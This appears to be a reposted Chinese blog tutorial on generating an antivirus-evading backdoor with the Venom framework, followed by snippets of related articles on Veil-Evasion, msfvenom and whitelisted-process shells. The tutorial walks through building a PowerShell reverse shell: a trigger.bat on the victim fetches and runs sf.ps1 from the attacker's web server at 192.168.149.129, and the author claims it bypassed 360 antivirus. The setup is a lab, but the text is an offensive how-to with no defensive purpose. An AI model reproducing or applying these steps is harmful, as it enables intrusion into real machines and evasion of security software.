利用meterpreter下的Venom免杀后门

转载请注明作者:admin-神风

下载地址:https://github.com/r00t-3xp10it/venom

1.从Github上下载框架:
tar.gz OR zip OR git clone

2.赋予文件可执行权限:
cd venom-main
sudo chmod -R +x *.sh
sudo chmod -R +x *.py

3.安装依赖关系包:
cd aux
sudo ./setup.sh

4.运行
sudo ./venom.sh

目标机:win7 sp1  ip:192.168.0.104

攻击机:kali 2.0  ip:192.168.149.129

运行后提示按ENTER(回车)

会出现一个目录菜单

这里利用目标机的Powershell来反弹shell

选择11

然后提示输入本机ip

提示输入端口

然后输入代码的名称

选中监听模块

确定反弹模块

确定后会在Venom/output目录下生成需要的payload,并且启动一个msf监听的小窗口

将trigger.bat放到目标机上,sf.ps1放到/var/www/html目录下

打开apache服务

service apache2 start

运行bat文件后会利用powershell去远程执行http://192.168.149.129/sf.ps1的文件

下面是成功过360并且成功反弹的截图

时间: 2024-10-02 02:31:58

利用meterpreter下的Venom免杀后门的相关文章

免杀后门之MSF&Veil-Evasion的完美结合

本文由“即刻安全”投稿到“玄魂工作室” Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目.利用它我们可以生成绕过杀软的 payload !kali 上并未安装,下面我们来进行简单的安装.我们直接从 github 上进行 clone 下载: git clone https://www.github.com/Veil-Framework/Veil-Evasion.git 图1 下载完成后,我们还需要对其软件配置包进行安装,依次输入如下命令: ls cd Ve

Metasploit制作免杀后门-----msfvenom

真正全部免杀是不会的,部分还是可以,主要是介绍msfvenom.-----现在依然还有很多教学视频.资料是使用之前的kali版本.随着更新有些命令是不适应最新的kali的.(也是掉过坑的人)msfvenom集成了msfpayload和msfencode,2015年之后移除了后两项.再按照某些教程输后两个命令是不行的. msfvenom重要参数:(可以使用msfvenom -h查看所有参数)-p payload设置 -e 编码设置-a 系统结构,默认x86-s payload最大大小-i 编码次数

基于白名单的免杀后门(1)

通过使用系统的一些服务进程完成Shell反弹,由于系统进程多数具有微软特征,所以自带免杀,杀毒软件都会默认放行 利用Msiexec进程反弹 Msiexec是Windows Installer的一部分.用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大.并且集成于Windows 7,Windows 10等,在Windows 10系统中无需配置环境变量就能直接被调用,非常的方便. 原文地址:https

20165310 NetSec2019 Week5 Exp3 免杀原理与实践

20165310 NetSec2019 Week5 Exp3 免杀原理与实践 一.免杀原理 杀软是如何检测出恶意代码的 基于特征码的检测:特征码就是一段恶意程序有但是正常程序没有的一段代码,当杀软检测到一个程序里有和特征码库中匹配的特征码,就会将它作为恶意程序处理. 启发式恶意软件检测:杀软根据程序的片面特征去推断其是否包含恶意代码,通常缺乏精确判定依据. 基于行为的恶意软件检测:是加入了行为监控的启发式检测,更加精确.当一个程序在运行时,杀毒软件会监视其行为,如果发现了这种特殊的行为,例如修改

20155330 《网络攻防》 Exp3 免杀原理与实践

20155330 <网络攻防> Exp3 免杀原理与实践 基础问题回答 杀软是如何检测出恶意代码的? 基于特征码.先对流行代码特征的提取,然后进行程序的比对,如果也检测到相应的特征码的程序即为检测出恶意代码. 基于行为.杀软通过检测程序是否有更改注册表行为.是否有设置自启动.是否有修改权限等等行为进行判断. 免杀是做什么? 恶意代码避免杀毒软件查杀,从而实现入侵. 免杀的基本方法有哪些? 对恶意代码进行加壳 利用shellcode进行编码 实践过程记录 使用msf生成后门程序的检测 将实验二中

2018-2019-2 20165114《网络对抗技术》Exp3 免杀原理与实践

Exp3 免杀原理与实践 目录 一.实验内容 二.基础问题回答 (1)杀软是如何检测出恶意代码的? (2)免杀是做什么? (3)免杀的基本方法有哪些? 三.实践过程记录 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧: 通过组合应用各种技术实现恶意代码免杀 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 四.实验总结与体会 五.开启杀软能绝对防止电脑中恶意代码吗? 一.实验

Exp3 免杀原理和实践

一.基础问题回答 1.杀软是如何检测出恶意代码的? (1)基于特征码的检测 特征码是能识别一个程序是一个病毒的一段不大于64字节的特征串.如果一个可执行文件包含这样的特征码则被杀毒软件检测为是恶意代码. (2)启发式恶意软件检测 一般在缺乏精确判定依据时,根据些片面特征去推断是否为恶意软件,比如如果一个软件在干通常是恶意软件干的事,看起来像个恶意软件,那就把它当成一个恶意软件. (3)基于行为的恶意软件检测 基于行为的检测相当于是启发式的一种,或者是加入了行为监控的启发式. 2.免杀是做什么?

2019-2020-2 网络对抗技术 20174310 Exp3 免杀原理与实践

1 实验要求 1.1 实验内容 1.1.1 实践各种免杀技术 - 正确使用msf编码器 - msfvenom生成如jar之类的其他文件 - veil - 加壳工具 - 使用C + shellcode编程 - 使用其他课堂未介绍方法 1.1.2 通过组合应用各种技术实现恶意代码免杀 1.1.3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 1.2 基础问题回答 1.杀软是如何检测出恶意代码的? 基于特征来检测:恶意代码中一般会有一段有较明显特征的代码也就是特征码,

20165306 Exp3 免杀原理与实践

Exp3 免杀原理与实践 一.实践内容概述 1.正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,加壳工具,使用shellcode编程 2.通过组合应用各种技术实现恶意代码免杀 3.用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 4.基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 简单来说一段特征码就是一段或多段数据.如果一个可执行文件(或其他运行的库.脚本等)包含这样的数据则被认为是恶意代码. AV软